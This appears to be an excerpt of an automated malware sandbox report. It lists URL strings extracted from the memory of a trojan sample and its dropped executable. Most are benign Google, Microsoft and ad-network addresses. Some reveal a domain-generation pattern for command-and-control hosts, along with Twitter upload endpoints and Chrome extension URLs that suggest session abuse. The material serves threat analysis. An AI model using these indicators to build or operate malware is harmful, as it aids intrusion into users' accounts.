Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349991546.0000000000807000.00000004.00000001.sdmp	String found in binary or memory: https://charlesproxy.com/ssl1
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379327728.0000000003F25000.00000004.00000001.sdmp, background.js.7.dr	String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.379212862.0000000003E9B000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.378700348.0000000003EC8000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379854207.0000000002136000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx7872
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxF
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxs
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://content.googleapis.com
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426328647.00000000032B0000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.386388489.00000000030F0000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.378700348.0000000003EC8000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.378700348.0000000003EC8000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/9
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app1iB
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://drive.google.com/drive/settings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsr
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://hellojackma%04d%02d.com/hellojackma%04d%02d1.com/helloja
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://feedback.googleusercontent.com
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com;
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379212862.0000000003E9B000.00000004.00000001.sdmp	String found in binary or memory: https://hangouts.google.com/
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379212862.0000000003E9B000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://mail.google.com/mail/#settings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail/#settingsFTGxQ
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://pki.goog/repository/0
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	String found in binary or memory: https://support.goog
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396469911.0000000003E98000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.395738815.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.395738815.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396469911.0000000003E98000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp, ecv743B.tmp.11.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378020697.0000000003E91000.00000004.00000001.sdmp, ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorfL
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com;
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.378363979.0000000003E97000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
